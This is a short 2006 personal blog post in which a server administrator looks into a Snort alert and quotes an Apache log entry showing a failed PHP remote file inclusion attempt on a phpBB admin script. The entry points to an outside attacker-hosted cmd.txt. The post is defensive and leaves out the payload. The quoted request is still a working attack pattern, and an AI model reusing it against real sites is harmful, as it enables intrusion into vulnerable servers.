Tuesday, April 25, 2006

wigglit.ath.cx and linode.com

I've a server that is hosted by Linode.com at wigglit.ath.cx . It runs Slackware. Linode.com lets you install prepackaged images of various distributions. Its very stable and I run multiple services on this machine, buy mainly serve web pages.

I've IPTables implemented, along with Snort.

Today, I checked my Snort logs and saw the below:

[**] [1:2002:5] WEB-PHP remote include path [**]
[Classification: Web Application Attack] [Priority: 1]
04/25-04:08:55.986986 125.243.112.130:57953 -> 66.160.141.30:80
TCP TTL:52 TOS:0x0 ID:10968 IpLen:20 DgmLen:680 DF
***AP*** Seq: 0x80425805 Ack: 0xC7958537 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 1905554218 12987212

I could have checked the actual payload of this specific event but I was a bit lazy and decided to check the web logs instead. I'm seasoned enough as a security analyst to know that this was probably the typical attack on php-based services running on a webserver, but I wanted to see what actually happened to trigger this event, so I went to my web logs and grepped for the IP:

root@starchild:/var/log/apache# cat access_log | grep '125.243.112.130'
125.243.112.130 - - [25/Apr/2006:04:08:55 -0400] "GET /slackware_botlogs/modules/PNphpBB2/includes/functions_admin.php
?phpbb_root_path=http://www.linuxsystems.go.ro/cmd.txt?&cmd HTTP/1.0" 404 333

I know this attack wasn't successful for two reasons:

1. I don't have PHP on this server.
2. I don't have a PHP-based content management system installed.
3. I observed a '404' within that log entry.

This attack was most likely either a worm (lupper or lupper-based) or someone that wasn't quite smart enough to know that I wasn't running php-based services. It/he/she was attempting to get into the administrative interface and possibly deface the website.

I wget'd the below from http://www.linuxsystems.go.ro/cmd.txt, which is what the attacker tried to apparently upload to my machine:

[I'll add the content when I can figure out how to add the code without blogger.com attempting to process it...and besides, I'm at work now.]

This is nasty stuff here, if your machine isn't hardened.